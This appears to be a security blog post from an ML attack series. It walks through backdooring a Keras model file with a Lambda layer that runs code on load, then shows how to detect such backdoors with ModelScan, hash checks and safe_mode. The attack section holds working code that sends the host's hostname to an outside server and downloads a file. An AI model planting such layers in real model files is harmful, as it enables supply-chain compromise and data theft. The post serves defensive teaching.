
Backdooring Keras Models and How to Detect It · Embrace The Red


This post is part of a series about machine learning and artificial intelligence.

Adversaries often leverage supply chain attacks to gain footholds. In machine learning, model deserialization issues are a significant threat because they can lead to arbitrary code execution, and detecting them is crucial. We explored this attack with Python Pickle files in the past.

In this post we backdoor the original Keras Husky AI model from the Machine Learning Attack Series, and afterwards investigate tooling to detect the backdoor.

The technique described is based on this post by Microsoft, named Abusing ML model file formats to create malware on AI systems.

Let’s get started.

Revisiting Husky AI

The original Husky AI model is stored as an .h5 file. You can find it here.

Note: If you want to follow along, check out this Notebook.

git clone https://huggingface.co/wunderwuzzi/huskyai

To get started let’s load up the original model:

import keras
model = keras.models.load_model("huskymodel.h5")
model.summary()

And do a random inference to ensure things work:

import numpy as np

# Random 128x128 RGB image with a batch dimension
random_image = np.expand_dims(np.random.rand(128, 128, 3), axis=0)
prediction = model.predict(random_image, verbose=0)
print("Prediction output:", prediction)

Prediction output: [[0.1144329]]

Great, so things work.

Now let’s put ourselves into an attacker’s shoes.

Loading the Original Model

Assume we find the Husky AI Keras model file (in this case the .h5 file) somewhere on a network share, where production systems, developers and/or data scientists load it from.

Threat => An attacker can perform a supply chain attack by modifying the file and adding malicious instructions.

Adding a Custom Layer

To add executable code, we can add a Keras lambda layer to the model architecture.

For the demo we:

  1. Print a “Hello world” message to visually demonstrate code execution, and
  2. Download an image from a remote server, leaking the machine’s hostname via the same web request (the same mechanism could be used to download malware to the host)

The code looks like this:

# Load a fresh copy of the original model to tamper with
temp_model = keras.models.load_model("huskymodel.h5")

# This function runs whenever the Lambda layer is executed, including at load time
def delicious_layer(x):
    print("Hello world! Husky AI is now backdoored.")

    import http.client, os
    if not os.path.exists("embracethered.png"):
        conn = http.client.HTTPSConnection("wuzzi.net")
        host = os.getenv("HOSTNAME")
        # Leak the hostname as a query parameter while downloading the image
        conn.request("GET", f"/l.png?lambdahost={host}")
        res = conn.getresponse()
        data = res.read()
        with open("embracethered.png", "wb") as f:
            f.write(data)
    # Pass the input through unchanged so predictions keep working
    return x

# Append the malicious Lambda layer to the model
lambda_layer = keras.layers.Lambda(delicious_layer)
temp_model.add(lambda_layer)

Saving the Backdoored Model File

Finally, we compile the model using the original settings and save it.

# Compile with the original settings; saving without a .keras/.h5 extension
# writes the legacy TensorFlow SavedModel format
temp_model.compile(optimizer=model.optimizer, loss=model.loss, metrics=model.metrics)
temp_model.save("huskymodel-lambda-backdoor")

There are multiple file format options when saving the model; more about this later.

Simulating the Attack

Now, let’s load the backdoored model.

backdoor_model = keras.models.load_model("huskymodel-lambda-backdoor")

(Screenshot: backdoor layer added, print statement fires on load)

As you can see in the screenshot above, the print statement was already executed!

Tip: If the model is saved as .keras, using the Keras v3 file format, then this load would fail.

This is because safe_mode=True is the default for v3; however, safe_mode is not considered for older model formats. Unfortunately, saving a model in the newer format is not the default, so remember to use the .keras extension and/or file_format="keras" when saving model files.
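
To make this concrete, here is a minimal sketch (assuming a Keras version that supports the v3 format; the exact error message varies by version):

# Saving with the .keras extension uses the v3 format
temp_model.save("huskymodel-lambda-backdoor.keras")

# With the default safe_mode=True, loading raises an error, because
# deserializing the Lambda layer would require running arbitrary code
keras.models.load_model("huskymodel-lambda-backdoor.keras")

# Only safe_mode=False loads it -- never do this with untrusted files
keras.models.load_model("huskymodel-lambda-backdoor.keras", safe_mode=False)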

Let’s take a look at the architecture to see if we can find the additional layer:

backdoor_model.summary()

Here we go:

(Screenshot: model summary showing the added Lambda layer)

Excellent, notice the last layer named lambda_17.

Checking the Result

As we observed earlier, just loading the model executed the print function:

Hello world! Husky AI is now backdoored.

And when listing the directory contents, we see that embracethered.png was indeed downloaded from the remote server.

-rw-r--r-- 1 root root  34K May 13 22:40 embracethered.png

And the server log also shows the hostname that was retrieved:

(Screenshot: server log showing the leaked hostname)

Nice, but scary!

Inspecting and Identifying Backdoored Models

If you walk through the Notebook, you can find Python code to check for hidden lambda layers and Python byte code.
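
For a rough idea of what the layer check looks like, here is a minimal sketch (not the Notebook’s exact code; note that loading an older-format model can itself execute embedded code, so run this in an isolated environment):

import keras

def find_lambda_layers(model):
    # Lambda layers can carry attacker-controlled Python code
    return [layer.name for layer in model.layers
            if isinstance(layer, keras.layers.Lambda)]

print(find_lambda_layers(backdoor_model))  # e.g. ['lambda_17']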

A very practical detection you should consider is Protect AI’s ModelScan tool.

pip install modelscan

Then you can point it to the model file:

modelscan -p huskymodel-lambda-backdoor

Observe that it indeed detected the backdoor:

(Screenshot: ModelScan output; the full text is in the Appendix)

Excellent. It’s great to have an open source tool available to detect this (and other) issues.

Severity levels are defined here. In our specific case, arbitrary code runs and a file is downloaded from a remote location, which arguably makes it higher severity than medium. So, make sure to investigate all flagged issues to look for malicious instructions.

Takeaway: I highly recommend integrating such tooling into your MLOps pipelines.
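
For instance, a simple pipeline gate might look like this (a sketch only; it assumes modelscan returns a non-zero exit code when it finds issues, so verify the exit-code semantics of the version you use):

import subprocess
import sys

# Scan the model artifact produced by the pipeline
result = subprocess.run(["modelscan", "-p", "huskymodel-lambda-backdoor"])

# Block the release if the scan flagged anything
if result.returncode != 0:
    sys.exit("ModelScan flagged the model - blocking deployment")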

Mitigations and Detections

  • Signature Validation: Use signatures and/or validate hashes of models (e.g. a SHA-256 hash; see the sketch after this list)
  • Audits: Ensure auditing of model files from untrusted sources
  • Scanning and CI/CD: Explore scanning tools like Protect AI’s modelscan
  • Isolation: Load untrusted models in isolated environments (if possible)
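
A minimal sketch of the hash validation, assuming a known-good digest was recorded when the model was published (EXPECTED_SHA256 is a hypothetical placeholder):

import hashlib

# Hypothetical placeholder: the digest recorded at publish time
EXPECTED_SHA256 = "known-good-digest-goes-here"

def sha256_of(path, chunk_size=8192):
    # Stream the file so large models don't have to fit in memory
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

if sha256_of("huskymodel.h5") != EXPECTED_SHA256:
    raise RuntimeError("Model hash mismatch - refusing to load")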

Conclusion

As we can see, machine learning model files should be treated like binary executables. We also discussed how backdoored model files can be detected, and what tooling can be integrated into MLOps pipelines.

Hope this was helpful and interesting.

Cheers,
Johann.

Appendix

ML Attack Series – Overview

ModelScan Output

--- Summary ---

Total Issues: 1

Total Issues By Severity:

    - LOW: 0
    - MEDIUM: 1
    - HIGH: 0
    - CRITICAL: 0

--- Issues by Severity ---

--- MEDIUM ---

Unsafe operator found:
  - Severity: MEDIUM
  - Description: Use of unsafe operator 'Lambda' from module 'Keras'
  - Source: /content/huskyai/models/huskymodel-lambda-backdoor/keras_metadata.pb

Loading an Image

import cv2
import numpy as np
import imageio.v2 as imageio
import matplotlib.pyplot as plt

num_px = 128  # model input size

def load_image(name):
    image = np.array(imageio.imread(name))
    image = cv2.resize(image, (num_px, num_px))
    # Drop the alpha channel if present
    if image.shape[-1] == 4:
        image = cv2.cvtColor(image, cv2.COLOR_RGBA2RGB)
    image = image / 255.
    image = np.expand_dims(image, axis=0)
    return image

Doing a Prediction

image1 = load_image("/tmp/images/val/husky/8b80a51b86ba1ec6cd7ae9bde6a32b4b.jpg")
plt.imshow(image1[0])
model.predict(image1)

Lost your password?